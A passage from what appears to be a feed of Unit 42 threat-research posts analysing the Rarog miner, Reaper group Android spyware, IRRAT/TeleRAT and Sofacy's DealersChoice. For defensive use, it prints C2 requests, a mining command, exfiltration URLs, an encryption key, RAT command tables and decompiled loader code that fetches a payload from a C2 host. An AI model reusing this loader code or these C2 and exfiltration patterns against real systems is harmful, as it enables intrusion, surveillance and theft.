The malware then makes the following request to retrieve the amount of time that Rarog will sleep before mining on the target victim:

POST /2.0/method/delay HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 6
Host: api.polotreck[.]xyz

id=250

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:11:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

10000

Prior to continuing, Rarog will check the running processes on the system for the following common security applications, and will not proceed if found:

  • NetMonitor
  • Taskmgr.exe
  • Process Killer
  • KillProcess
  • System Explorer
  • AnVir
  • Process Hacker

Rarog takes the previously collected CPU usage percentage and applies it against the number of CPUs found on the system. As an example, if a system had four CPU cores, and the setting was at 50%, Rarog could configure the miner to use 2 threads (0.5 x 4). The following mining command is executed by Rarog:

C:ProgramData{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}xmrig32.exe -o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t 1

Botnet Functionality

Rarog will periodically make HTTP POST requests to the following:

POST /2.0/method/setOnline HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
Content-Length: 16
Host: api.polotreck[.]xyz

id=250&build=5.1

HTTP/1.1 200 OK
Server: nginx/1.13.10
Date: Wed, 21 Mar 2018 17:28:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.30-0+deb8u1

This particular URI has the ability to provide additional tasks for Rarog to perform. The following list of supported commands are included:

Command Description
install Download and execute specified file
open_url Open the specified URL in browser
ddos Perform DDoS operations against specified target
update Update Rarog Trojan from specified URL
restart_bot Restart Rarog Trojan
delete_bot Delete Rarog Trojan

SHA256 Hashes

For a full list of SHA256 hashes and their first encountered timestamp, please refer to the following file.

C2 Servers

For a full list of C2 servers and their first encountered timestamp, please refer to the following file.

File and Folder Artifacts

C:ProgramDataMicrosoftCorporationWindowsSystem32

C:ProgramDataMicrosoftCorporationWindowsSystem32Isass.exe

C:ProgramDataMicrosoftCorporationWindowsSystem32_Isass.exe

C:ProgramData{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}

C:ProgramData{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}driver.dat

C:ProgramDataWindowsAppCertification

C:ProgramDataWindowsAppCertificationWindowHelperStorageHostSystemThread.ps1

C:ProgramDataWindowsAppCertificationcert.cmd

C:ProgramDataWindowsAppCertificationchecker.vbs

C:ProgramDataMicrosoftCorporationWindowsHelpers

C:ProgramDataMicrosoftCorporationWindowsHelpersSecurityHeaIthService.exe

C:ProgramDataMicrosoftCorporationWindowsHelpersSystemldleProcess.exe

C:ProgramDataMicrosoftCorporationWindowsHelperswinIogon.exe

C:ProgramData{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}

C:ProgramDataMicrosoftCorporationWindowsModules

Registry Artifacts

HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows_Antimalware_Host_Syst

The post Smoking Out the Rarog Cryptocurrency Mining Trojan appeared first on Palo Alto Networks Blog.

Go to Source
Author: Unit 42

Reaper Group’s Updated Mobile Arsenal

Summary

A recent post from EST Security revealed the use of Android spyware in spear phishing email attachments linked to the North Korean Reaper group (also known as APT37, Scarcruft, Group 123 or Red Eyes), highlighting a new mobile vector added to the threat group’s toolkit.

Unit 42 has looked further into EST’s findings and found a more advanced variant of the Trojan mentioned in their original article. Talos has written on this variant and named it KevDroid.

This post provides our analysis of KevDroid., as well as details on the discovery of previously unknown trojanized versions of a Bitcoin Ticker Widget and a PyeongChang Winter Games application, that are downloaders for the spyware variants.

Background

The post by EST Security detailed an Android spyware disguising itself as an Anti-Virus app from Naver (the largest search and web portal service provider in South Korea). While hunting for similar samples, I came across two more versions of the same variant. One of those called home to cgalim[.]com, a domain that Palo Alto Networks had already observed being used by the Reaper group in non-mobile attacks (IOCs in Appendix).

App Name Icon SHA256
Google Defender Update  Google_1 06222141a684de8a0b6e5dc1f7a2b14603c98dbe404ad7605dc9eb9d903c3df8
Update  Android_reaper f33aedfe5ebc918f5489e1f8a9fe19b160f112726e7ac2687e429695723bca6a


Table 1: Additional samples found for the original Android spyware variant linked to the Reaper group

Pivoting on artefacts from the original variant led to the discovery of a more advanced variant of the same spyware, which is described in detail further below. In addition, I also stumbled upon two Android applications that serve as downloaders for each of the two variants. They are discussed next.

Downloaders

While investigating the Reaper group’s Android spyware variants, I found two applications that have the ability to download and install an application from hxxp://cgalim.com/admin/hr/1[.]apk. I also observed the same URL serving the advanced variant of the Android spyware, confirming that these two applications served as downloaders for the Reaper group’s Android spyware. The two applications are trojanized versions of popular applications available on the Google Play Store. The two trojanized versions were not posted on Google Play.

While both downloaders contacted the same URL to download their payloads, looking further into their code I found that they were each written to respectively download and drop one specific variant of Reaper’s Android spyware.

App Name Icon SHA256 DROPPED PAYLOAD
PyeongChang Winter Games  Wintergames 28c69801929f0472cef346880a295cdf4956023cd3d72a1b6e72238f5b033aca New variant
Bitcoin Ticker Widget  bitcoin 679d6ad1dd6d1078300e24cf5dbd17efea1141b0a619ff08b6cc8ff94cfbb27e Original variant

Table 2: Android downloaders used to drop spyware variants linked to the Reaper group

Both applications are signed with the same certificate thereby confirming their origins from the same author(s)

Owner: CN=Jhon Phalccon, OU=Google Chrome, O=Google Chrome, L=Washington, ST=US, C=US
Issuer: CN=Jhon Phalccon, OU=Google Chrome, O=Google Chrome, L=Washington, ST=US, C=US
Serial number: 7b320fab
Valid from: Wed Jan 24 10:22:50 GMT 2018 until: Sun Jun 11 10:22:50 GMT 2045

Once these downloaders are installed, they display a message prompting the user to update the application. If the user follows the prompts, the downloader retrieves the payload and saves it to the external device memory as AppName.apk. The payload is then loaded prompting the user again to confirm its installation before it is finally installed on the device. The next section provides an analysis of the newer, more advanced variant of these payloads.

Advanced Variant Analysis

The following sample was used for this analysis

App Name Icon SHA256
PU (Blank) 990d278761f87274a427b348f09475f5da4f924aa80023bf8d2320d981fb3209

Table 3: New Android spyware variant discovered, linked to the Reaper group

This sample has the following abilities:

  • Record video (default duration is 10 mins)
  • Record audio (default duration is 5 mins, saved as 48_d[TS].amr)
  • Capture screenshots (saved as 96_d[TS].jpg)
  • Grab the phone’s file listing (saved as 128_d[TS].txt)
  • Fetch specific files
  • Download a list of commands
  • Get device info – 64-bit Android ID, Phone number, System Properties etc (saved as 208_d[TS].json)
  • Rooting the device, using a binary called ‘poc’ in the package assets

Additionally, this advanced variant is capable of exfiltrating:

  • Voice recordings from incoming and outgoing calls (saved as _p[Ph]_in_[D].amr or _p[Ph]_out_[D].amr)
  • Call logs (saved as 16_d[TS].json)
  • SMS history (saved as 32_d[TS].json)
  • Contact lists (saved as 144_d[TS].json)
  • Information on registered accounts on the phone (saved as 160_d[TS].json),

In each of these cases, [TS] is the current timestamp in the format yyyyMMddkkmmss, [Ph] is the source or destination phone number for a call, and [D] is the call duration.

While these exfiltration capabilities are shared in common with the original variant, this new variant writes its own call recording library as opposed to using the open source library that was used by its predecessor.

All exfiltrated information is written to the directory /sdcard/_pu on the phone and sent to hxxp://hakproperty.com/new/plat/pu[.]php?do=upload.

Before transmission, the files are AES-encrypted using the key “08D03B0B6BE7FBCD”. This encryption scheme and key is consistent across the two variants.

Post-encryption the files are renamed with the addition of a suffix ‘x’. All created files are deleted after they are sent to the upload server.

When commanded to fetch a list of commands, the list is fetched from

hxxp://hakproperty.com/new/plat/pu[.]php?do=download_rc&aid=" + [64-bit android_id]

Conclusion

The emergence of a new attack vector, followed by the appearance of new variants disguising themselves as currently relevant applications like the Winter Olympics, indicates expanding operations of the Reaper group that are actively in development.

Palo Alto Networks customers benefit from the following protections against these attacks:

  1. AutoFocus customers can track the group’s activity using the Reaper tag.
  2. WildFire detects all related samples with malicious verdicts.
  3. Traps blocks all malicious files associated with this group.

IOCs

Reaper Downloader APK samples
28c69801929f0472cef346880a295cdf4956023cd3d72a1b6e72238f5b033aca
679d6ad1dd6d1078300e24cf5dbd17efea1141b0a619ff08b6cc8ff94cfbb27e
Advanced Variant sample
990d278761f87274a427b348f09475f5da4f924aa80023bf8d2320d981fb3209
Non-APK Reaper-related samples making use of cgalim[.]com
0de087ffb95c88a65e83bd99631d73d0176220e8b740785de78d2d79294f2303
6b1f2dfe805fa0e27139c5a4840042599262dbbf4511a118d3fba3d4ec35f2d7
86887ce368d9a3e7fdf9aa62418cd68daeea62269d17afb059ab64201047e378
d29895aa3f515ec9e345b05882ee02033f75745b15348030803f82372e83277a
d5de09cc5d395919d2d2000f79326a6997f4ec079879b11b05c4d1a1a847ed00

The post Reaper Group’s Updated Mobile Arsenal appeared first on Palo Alto Networks Blog.

Go to Source
Author: Ruchna Nigam

TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users

Summary

Telegram Bots are special accounts that do not require an additional phone number to setup and are generally used to enrich Telegram chats with content from external services or to get customized notifications and news. And while Android malware abusing Telegram’s Bot API to target Iranian users is not fresh news (the emergence of a Trojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these Telegram Bots were being abused to command and control malicious Android applications.

This blog details our findings navigating through some Operational Security (OPSEC) fails while sifting through multiple malicious APK variants abusing Telegram’s Bot API; including the discovery of a new Trojan we’ve named “TeleRAT”. TeleRAT not only abuses Telegram’s Bot API for Command and Control (C2), it also abuses it for data exfiltration, unlike IRRAT.

What We Already Know- IRRAT

Based on previous reports, we know Telegram’s Bot API was already being employed by attackers to steal information ranging from SMS and call history to file listings from infected Android devices. The majority of the apps we saw disguise themselves as an app that tells you how many views your Telegram profile received – needless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such information.

We continue to see IRRAT active in the wild to this date.

We used the below sample for this analysis.

SHA256 1d0770ac48f8661a5d1595538c60710f886c254205b8cf517e118c94b256137d

TeleRAT works by creating and then populating the following files on the phone’s SD Card and sending them to the upload server, after the app’s first launch:

  • “[IMEI] numbers.txt”: Contact information
  • “[IMEI]acc.txt”: List of Google accounts registered on the phone
  • “[IMEI]sms.txt”: SMS history
  • 1.jpg: Picture taken with the front-facing camera
  • Image.jpg: Picture taken with back-facing camera

Finally, it reports back to a Telegram bot (identified by a bot ID hardcoded in each RAT’s source code) with the below beacon, and the application icon is then hidden from the phone’s app menu:

hxxp://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]?text=نصب جدیدn [IMEI] nIMEI : :[IMEI]nAndroid ID : [AndroidID]nModel : [PhoneModel]n[IP] nnIMEI دستگاه: [IMEI]

In the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain commands, as detailed below.

Command Action Communication to Telegram bot
call@[IMEI]@[Number] Places a call to [Number] hxxps://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]&text=call with [Number]
sms@[IMEI]@[Number]@[Text] SMS [Text] to [Number] hxxps://api.telegram.org/bot[APIKey] /sendmessage?chat_id=[ChatID]&text=sent
getapps@[IMEI] Saves a list of installed apps to SD Card to file named  “[IMEI] apps.txt”, uploads to upload server None
getfiles@[IMEI]@[DirPath] Retrieves file listing from [DirPath], saves to SD Card as “[IMEI]files.txt”, uploads to server None
getloc@[IMEI] Starts a GPS listener that monitors location changes None
upload@[IMEI]@[FilePath] Uploads file at [FilePath] None
removeA@[IMEI]@[FilePath on SDCard] Deletes file at [FilePath on SDCard] https://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]&text= ______________[FilePath on SDCard]
removeB@[IMEI]@[DirPath on SDCard] Deletes [DirPath on SDCard] None
lstmsg@[IMEI] Saves SMS history to SD Card as ”[IMEI]lstmsg.txt”, uploads to server None
yehoo@[IMEI] Takes a picture with Front Camera, saves to SD Card as “yahoo.jpg”, uploads to server None


Table
1: List of IRRAT bot commands

As the table above shows, this IRRAT sample makes use of Telegram’s bot API solely to communicate commands to infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting service. Fortunately for us, these servers had several OPSEC fails. More on that further below.

A New Family- TeleRAT

While sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs seemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for C2 but also for exfiltrating stolen information.

Telerat_1

Figure 1: pivoting in autofocus for applications using the Telegram bot API

We named this new family “TeleRAT” after one of the files it creates on infected devices.

We used the below sample for this analysis.

SHA256 01fef43c059d6b37be7faf47a08eccbf76cf7f050a7340ac2cae11942f27eb1d

Post-installation TeleRAT creates two files in the app’s internal directory:

  • telerat2.txt containing a slew of information about the device – including the System Bootloader version number, total and available Internal and External memory size, and number of cores.
  • thisapk_slm.txt mentioning a Telegram channel and a list of commands. We investigate this Telegram channel is greater detail further below.

The RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the Telegram Bot API with the current date and time.

More interestingly, it starts a service that listens for changes made to the Clipboard in the background.

Telerat_2

Figure 2: Code snippet that listens for clipboard changes

Finally, the app fetches updates from the Telegram bot API every 4.6 second, listening for the following commands (we used Google Translate for the below Farsi (Persian) translations):

 

Command Translation
دریافت مخاطبین Get contacts
دریافت کلیپ بورد Get the clipboard
Clipboard set:[text]
دریافت مکان Get location
دریافت اطلاعات شارژ Receive charging information
All file list:/[path]
Root file list:/[path]
دریافت برنامه ها Get apps
1Downloadfile/[filename]
2Downloadfile/[filename]
CreateContact/[name]/[number]
SetWallpaper http[URL]
دریافت پیام ها Receive (SMS) messages
Sendsmsfor/[destination]/[text]
MessageShow[text]
گرفتن عکس1 Take photo 1 (front camera)
گرفتن عکس2 Take photo 2 (back camera)
دریافت وضعیت Get status
دریافت تماس ها Receive calls
DeleteDir[dirname]
سایلنت Silent (set to Vibrate mode)
صدادار Loud (set to normal Ringer mode)
بیصدا Silent (set to Silent mode)
Blacksc Blacks out phone screen
Blackscf Clears black screen
ضبط فیلم Audio recording (saves recorded audio to AUDIO123/MUSIC/rec123.m4a on SD Card)
توقف ضبط فیلم Stop audio recording
راهنمای دستورات Instruction manual (Help Menu)
call to [number]
RESET (deletes thisapk_slm.txt and sends a new registration message to Telegram bot)
دریافت گالری Get gallery (sends files from the /Dcim folder on the SD Card to Telegram bot)
Delete app files or دریافت گالری
Vibrate [x] (Causes phone to vibrate for x seconds, with a maximum value of 600 secs)
لرزش کم Low vibration (for a duration of 150 secs)
لرزش متوسط Medium vibration (350 secs)
لرزش زیاد Shake too much (600 secs)


Table
2: List of TeleRAT bot commands

Aside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated data using Telegram’s sendDocument API method.

Telerat_3

Figure 3: Code snippet showing the use of the SendDocument Telegram bot API method

TeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on traffic to known upload servers, as all communication (including uploads) is done via the Telegram bot API. However, it still leaves other doors open via Telegram’s bot API, since the API Keys are hardcoded in the APKs.

The API allows fetching updates by two means:

1.The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including usernames from which the commands originated. From the bots that were still responding and had an update history (incoming updates are only kept for 24 hours as per Telegram’s policy), we were able to find bot commands originating from four Telegram accounts, shown below.

Telerat_5

Figure 4: Telegram usernames revealed from bot command histories

2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook. Their policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used certificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world of third party webhosting and open directories. Let’s Encrypt has been notified about this activity.

A sample of only a few Webhooks we found are shown below. hxxps://mr-mehran[.]tk/pot/Bot/ in particular appears to be hosting close to 6500 bots, however, we can’t confirm whether they’re all used for malicious purposes.

Telerat_6

Figure 5: Webhooks found associated with some TeleRAT bots

OPSEC Fails, Distribution Channels & Attribution

In our research we were able find what was clearly an image of the botmaster testing out the RAT, based on the Telegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.

Telerat_7

Figure 6: Image of botmaster testing out the RAT

We were also able to find exfiltrated messages that confirmed our theory about the test run and reveals a thread in Persian Farsi seemingly discussing bot setup.

“صبح ساعت ۶ انلاین شو تا روباته رو امتحان کنیم”

Google Translation: “Morning 6 hours online to try the robotage

While investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in the code. One username is seen in the screenshot below.

Telerat_7_real

Figure 7: Telegram channel advertised in source code

Looking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders that ran the entire gamut – from applications that get you likes and followers on Instagram, to ransomware, and even the source code for an unnamed RAT (complete with a video tutorial, shown below).

Telerat_8

Figure 8: Screenshot from a Telegram channel advertising & sharing a RAT source code

Aside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon some threads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum is frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we came across.

Telerat_9

Figure 9: Advertisement for sale of a Telegram bot control library

The forum goes the extra mile to mention all content is in accordance with Iran’s laws. However, it’s hard to see any non-malicious use for some of the code advertised there or written by developers that frequent it – for instance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet in Figure 3 further above).

Telerat_10

Figure 10: Forum Disclaimer

Overall, TeleRAT pieces together code written by several developers, however, due to freely available source code via Telegram channels and being sold on forums, we can’t point to one single actor commanding either IRRAT or TeleRAT and it appears to be the work of several actors possibly operating inside of Iran.

Victimology

As we investigated these RATs, we also started looking at how victims were getting infected. Further investigating, we witnessed several third-party Android application stores distributing seemingly legitimate applications like “Telegram Finder”, which supposedly helps users locate and communicate with other uses with specific interests, like knitting. Also, we’ve witnessed several samples distributed and shared via both legitimate and nefarious Iranian Telegram channels.

Telerat_11

Figure 11: leIranian third-party application store

Looking closer at the malicious APKs we were able to get an understanding of common application naming conventions and functionality across the board.

Telerat_12

Figure 12: ‘Telegram finder’ application

Based on the samples we analysed, the three most common application names for both IRRATand TeleRAT are:

Native App Name Translated App Name
پروفایل چکر Profile Cheer
بازدید یاب تلگرام Telegram Finder
telegram hacker N/A

Additionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such as “atom vpn” and “vpn for telegram.

There appears to be a total identified victim count of 2,293 at the time of writing, based on the infrastructure we analysed. There appears to be a rather small range of geographically dispersed victims, with 82% of having Iranian phone numbers.

Iran 1894
Pakistan 10
India 227
Afghanistan 109
United Kingdom 53

There may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the number of victims likely residing within Iran far exceeds the victim count for any other country.

Conclusion

Part of dissecting and understanding new threats involve looking closer at already established campaigns and malware variants. This is a perfect example of just that; looking closer at a previously established malware family to better understand it’s current and possibly changed capabilities.

While malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family, TeleRAT, hiding entirely behind Telegram’s API to evade network-based detection and exfiltrate data. Leveraging intelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to paint an accurate picture of an ongoing operation leveraging Telegram’s API and targeting users via third party application sites and social media channels.

Taking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such as:

  • Avoid third-party application stores or sources.
  • Don’t allow application sideloading on your device.
  • Ensure the application you are installing is official, regardless of source.
  • Closely review and scrutinize application permission requests prior to installation.

Palo Alto Networks customers are protected from this threat by:

  1. WildFire detects all TeleRAT and IRRAT files with malicious verdicts.
  2. AutoFocus customers can track these samples with the IRRAT and TeleRAT
  3. Traps blocks all of the APK files associated with TeleRAT and IRRAT.

APPENDIX

Telegram usernames found commanding IRRAT or TeleRAT

Ahmad_ghob
My_LiFe_M_a_H_s_A
mmm1230a

Webooks

hxxps://mr-mehran.tk/pot/Bot/robotcreat2_bot/Bot/Ejsahahbot/
hxxps://ib3.ibot24.com/394083/
hxxps://rr5.000webhostapp.com/upload_file.php
hxxps://gold.teleagent.ir/bnrdehisaz/index.php
hxxps://shahin-soori.ir/bots/rat/upload_file.php
hxxps://mbosoba.000webhostapp.com/upload_file.php
hxxps://abolking.000webhostapp.com/upload_file.php
hxxps://botmohsan-apk.000webhostapp.com/Bot/bot.php
hxxps://androydiha.ir/bot/Bot/hackelmi_bot/index.php
hxxps://hamidhamid954321.000webhostapp.com/Bot/bot.php
hxxps://mohsan024024.000webhostapp.com/upload_file.php
hxxps://09152104574nazimilad.000webhostapp.com/ربات ساز/CreateBotAll.php
hxxps://darkforceteam.000webhostapp.com/SmartAccounts_Bot/bots/Ratjadidebot/index.php

The post TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users appeared first on Palo Alto Networks Blog.

Go to Source
Author: Ruchna Nigam

Sofacy Uses DealersChoice to Target European Government Agency

Summary

Back in October 2016, Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, which we also documented in our December 2016 publication discussing Sofacy’s larger campaign.

On March 12 and March 14, we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice. The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server, but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed.

One of the differences was a particularly clever evasion technique: to our knowledge this has never been observed in use. With the previous iterations of DealersChoice samples, the Flash object would immediately load and begin malicious tasks. In the March attacks, the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on. Also, DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system.

The overall process to result in a successful exploitation is:

  1. User must open the Microsoft Word email attachment
  2. User must scroll to page three of the document, which will run the DealersChoice Flash object
  3. The Flash object must contact an active C2 server to download an additional Flash object containing exploit code
  4. The initial Flash object must contact the same C2 server to download a secondary payload
  5. Victim host must have a vulnerable version of Flash installed

The Attack

The attack involving this updated variant of DealersChoice was targeting a European government organization. The attack relied on a spear-phishing email with a subject of “Defence & Security 2018 Conference Agenda” that had an attachment with a filename of “Defence & Security 2018 Conference Agenda.docx”. The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the “Underwater Defence & Security 2018 Conference” here.

Opening the attached “Defence & Security 2018 Conference Agenda.docx” file does not immediately run malicious code to exploit the system. Instead, the user must scroll to the third page of the document, which will load a Flash object that contains ActionScript that will attempt to exploit the user’s system to install a malicious payload. The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice. This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it.

We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page. According to the document.xml file, the DealersChoice loader SWF exists after the “covert-shores-small.png” image file within the delivery document. This image file exists on the third page of the document, so the user would have to scroll down in the document to this third page to get the SWF file to run. The user may not notice the Flash object on the page, as Word displays it as a tiny black box in the document, as seen in Figure 1. This is an interesting anti-sandbox technique, as it requires human interaction prior to the document exhibiting any malicious activity.

Sofacy1

Figure 1 Flash object appearing as a small black box in delivery document

Updated DealersChoice

This DealersChoice Flash object shares a similar process to previous variants; however, it appears that the Sofacy actors have made slight changes to its internal code. Also, it appears that the actors used ActionScript from an open source video player called “f4player”, which is freely available on GitHub with the following description:

f4Player is an open source flash (AS3) video player and library project. It is so small that it is only 10kb (with skin file) and totally free under GPL license.

The Sofacy developer modified the f4player’s ActionScript to include additional code to load an embedded Flash object. The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function (“skinEvent2”) that plays the decrypted object, as seen in the code snippet below:

var skinEvent2:Function = function(param1:Event):void
 {
    skin2 = param1.currentTarget.content;
    stage.addChild(skin2);
    skin2.play("hxxp://ndpmedia24[.]com/0pq6m4f.m3u8");
 };
 var mov:Loader = new Loader();
 mov.contentLoaderInfo.addEventListener(Event.COMPLETE,skinEvent2);
 var b:ByteArray = new this.Mov();
 var k:uint = 82;
 var i:uint = 4;
 while(i < b.length)
 {
    b[i] = b[i] ^ k;
    i++;
 }
 mov.loadBytes(b);

The above code allows DealersChoice to load a second SWF object, specifically loading it with an argument that includes a C2 URL of “hxxp://ndpmedia24[.]com/0pq6m4f.m3u8”.

The embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server’s ‘crossdomain.xml’ file in order to obtain permissions to load additional Flash objects from the C2 domain. The ActionScript relies on event listeners to call specific functions when the event “Event.COMPLETE” is triggered after successful HTTP requests are issued to the C2 server. The event handlers call functions with the following names, which includes an incrementing number that represents the order in which the functions are called:

  • onload1
  • onload2
  • onload3
  • onload5

With these event handlers created, the ActionScript starts by gathering system data from the flash.system.Capabilities.serverString property (just like in the original DealersChoice.B samples) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded. When this HTTP request completes, the event listener will call the ‘onload1’ function.

The ‘onload1’ function parses the response data from the request to the C2 URL using regular expressions. According to the following code snippet, it appears the regular expression is looking for a hexadecimal string after “/” and before “/sec”, as well as any string between “/hls/” and “/tracks”:

var data:String = e.target.data;
var p1:RegExp = //([0-9a-f]+)/sec/gim;
r1 = p1.exec(data);
var r2:Array = p1.exec(data);
var p2:RegExp = //hls/(.+)/tracks/gim;
var r3:Array = p2.exec(data);
r4 = p2.exec(data);

The regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Steaming (HLS) traffic, which is a protocol that uses HTTP to deliver audio and video files for streaming. The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate. The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server. The following is a list of these variables and their purpose:

Variable Purpose
r1 Used as the decryption key for the downloaded SWF file. This will be a 16-byte hexadecimal string.
r2 Not used.
r3 Used as the URL within the HTTP request within onload1 function, specifically as the URL to get the malicious SWF file to exploit the system.
r4 Used as the URL within the HTTP request within onload2 function, specifically as the URL to get the payload to run after successful exploitation of the system.

The ‘onload1’ function then sends an HTTP GET request to the C2 domain using the value stored in the ‘r3’ variable as a URL. When this HTTP request completes, the event listener will call the ‘onload2’ function.

The ‘onload2’ function decrypts the response received from the HTTP request issued in ‘onload1’ function. It does so by calling a sub-function to decrypt the content, using the value stored in the ‘r1’ variable as a key. The sub-function to decrypt the content skips the first 4 bytes, suggesting that the first four bytes of the downloaded content is in cleartext (most likely the “FWS” or “CWS” header to look legitimate).

After decrypting the content, the ‘onload2’ function will issue another HTTP GET request with the system data as a parameter, but this time to the C2 using a URL from the ‘r4’ variable. When this request completes, the event listener will call the ‘onload3’ function.

The ‘onload3’ function will take the response to the HTTP request in ‘onload2’ and treat it as the payload. The ActionScript will read each byte of the C2 response and get the hexadecimal value of each byte and create a text array of 4-byte hexadecimal values with “0x” prepended and “,” appended to each using the following code:

sh = she + ("0x" + hex.substr(i + 6,2) + hex.substr(i + 4,2) + hex.substr(i + 2,2) + hex.substr(i,2) + ",");

This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable (PE) payload. The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in ‘onload2’. This function creates an event listener for when the SWF file is successfully loaded, which will call the ‘onload5’ function.

The ‘onload5’ function is responsible for adding the newly loaded SWF object as a child object to the current running object using the following code:

stage.addChild(param1.currentTarget.content);

This loads the SWF file, effectively running the malicious code on the system. During our analysis, we were unable to coerce the C2 into providing a malicious SWF or payload. As mentioned in our previous blogs on DealersChoice, the payload of choice for previous variants was SofacyCarberp (Seduploader), but we have no evidence to suggest this tool was used in this attack. We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack.

Linkage to Prior Campaign

The delivery document used in this attack was last modified by a user named ‘Nick Daemoji’, which provides a linkage to previous Sofacy related delivery documents. The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp/Seduploader payloads, as discussed in Talos’ blog. This overlap also points to a similar social engineering theme between these two campaigns, as both used content from upcoming military and defense conferences as a lure.

Conclusion

The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns. In the most recent variant, Sofacy modified the internals of the malicious scripts, but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server. Unlike previous samples, this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object. The required user interaction turned out to be an interesting anti-sandbox technique that we had not seen this group perform in the past.

Indicators of Compromise

DealersChoice

0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 (Defence & Security 2018 Conference Agenda.docx)

ndpmedia24[.]com

Macro-ladened documents

e5511b22245e26a003923ba476d7c36029939b2d1936e17a9b35b396467179ae

efb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52

c4be15f9ccfecf7a463f3b1d4a17e7b4f95de939e057662c3f97b52f7fa3c52f

The post Sofacy Uses DealersChoice to Target European Government Agency appeared first on Palo Alto Networks Blog.

Go to Source
Author: Robert Falcone

HenBox: The Chickens Come Home to Roost

Summary
henbox_1

Unit 42 recently discovered a new Android malware family we named “HenBox” masquerading as a variety of legitimate Android apps.  We chose the name “HenBox” based on metadata found in most of the malicious apps such as package names and signer detail. HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app. While some of the legitimate apps HenBox use as decoys can be found on Google Play, HenBox apps themselves have only been found on third-party (non-Google Play) app stores.

HenBox appears to primarily target the Uyghurs – a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China. It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI, an operating system based on Google Android made by Xiaomi. Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China. The result is a large online population who have been the subject of numerous cyber-attacks in the past.

